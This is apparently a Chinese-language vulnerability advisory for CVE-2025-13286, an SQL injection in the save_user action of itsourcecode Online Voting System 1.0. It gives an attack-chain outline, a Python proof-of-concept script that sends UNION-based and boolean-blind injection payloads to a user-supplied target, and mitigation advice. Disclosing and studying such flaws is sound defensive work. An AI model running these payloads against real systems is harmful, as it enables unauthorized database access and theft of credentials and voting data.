CVE-2025-13286 itsourcecode Online Voting System 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13286

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Voting System 1.0

漏洞概述

CVE-2025-13286是itsourcecode Online Voting System 1.0中发现的一个中等严重性安全漏洞。该漏洞存在于ajax.php文件的save_user操作中，攻击者可以通过操纵ID参数进行SQL注入攻击。由于该漏洞具有远程利用可能性且已公开利用代码，构成了实际的安全风险。受影响的系统位于网络边界，攻击者无需特殊权限即可发起攻击，但需要经过身份验证（低权限）。该SQL注入漏洞可能导致敏感数据库信息泄露、用户数据篡改，甚至在某些配置下可能实现远程代码执行。漏洞影响投票系统的机密性、完整性和可用性，造成低至中等程度的影响。由于漏洞已公开披露并存在利用代码，尚未修复的系统面临迫切的安全威胁。

技术细节

该SQL注入漏洞位于Web应用的/ajax.php文件中的save_user操作。攻击者通过构造恶意的ID参数值，可以将任意SQL代码注入到后端数据库查询中。由于应用程序未对用户输入进行充分的参数化查询或输入过滤，攻击者可以利用UNION SELECT、布尔盲注或时间盲注等技术提取数据库中的敏感信息。漏洞利用需要攻击者具有低权限用户账户，但无需高级权限即可成功实施攻击。攻击向量为网络层面，远程攻击者可以通过HTTP请求直接利用该漏洞。成功利用后可能导致用户密码哈希、投票记录、个人身份信息等敏感数据泄露。

攻击链分析

STEP 1

步骤1

攻击者识别目标itsourcecode Online Voting System 1.0的安装位置

STEP 2

步骤2

攻击者注册或获取一个低权限用户账户

STEP 3

步骤3

攻击者构造恶意SQL注入载荷，针对/ajax.php?action=save_user端点的ID参数

STEP 4

步骤4

通过HTTP POST请求发送注入载荷，利用UNION注入或盲注技术提取数据库信息

STEP 5

步骤5

成功利用后获取用户凭据哈希、投票数据或其他敏感信息

STEP 6

步骤6

攻击者利用窃取的敏感数据进行进一步攻击或数据售卖

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13286 SQL Injection PoC
# Target: itsourcecode Online Voting System 1.0
# Endpoint: /ajax.php?action=save_user

target_url = input("Enter target URL (e.g., http://target.com): ").strip()

# SQL Injection payload - extract database version
payload = "1' UNION SELECT NULL,version(),user(),database(),NULL,NULL---"

# Prepare the request
endpoint = f"{target_url}/ajax.php?action=save_user"
data = {
    "id": payload,
    "username": "test",
    "password": "test123"
}

print(f"[*] Targeting: {endpoint}")
print(f"[*] Payload: {payload}")

try:
    response = requests.post(endpoint, data=data, timeout=10)
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Body:\n{response.text}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Boolean-based blind injection test
print("\n[*] Testing boolean-based blind injection...")
true_payload = "1' AND 1=1---"
false_payload = "1' AND 1=2---"

data_true = {"id": true_payload, "username": "test", "password": "test"}
data_false = {"id": false_payload, "username": "test", "password": "test"}

try:
    r_true = requests.post(endpoint, data=data_true, timeout=10)
    r_false = requests.post(endpoint, data=data_false, timeout=10)
    if r_true.status_code != r_false.status_code or r_true.text != r_false.text:
        print("[+] Blind SQL injection confirmed!")
    else:
        print("[-] Blind SQL injection test inconclusive")
except Exception as e:
    print(f"[-] Error during testing: {e}")

影响范围

itsourcecode Online Voting System 1.0

防御指南

临时缓解措施

在官方修复方案发布前，可采取以下临时缓解措施：1) 在Web应用防火墙中配置SQL注入检测规则，阻止针对ajax.php的恶意请求；2) 临时禁用save_user功能或限制其访问权限；3) 对数据库账户权限进行严格限制，避免Web应用账户具有DBA或管理员权限；4) 实施入侵检测系统监控异常数据库查询行为；5) 限制对管理接口的网络访问，仅允许受信任的IP地址访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13286
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13286
3 Details https://www.cvedetails.com/cve/CVE-2025-13286/
4 VulDB https://vuldb.com/cve/CVE-2025-13286
5 Link https://github.com/WANGshuyan2025/cve/issues/8
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.332626
8 Link https://vuldb.com/?id.332626
9 Link https://vuldb.com/?submit.690888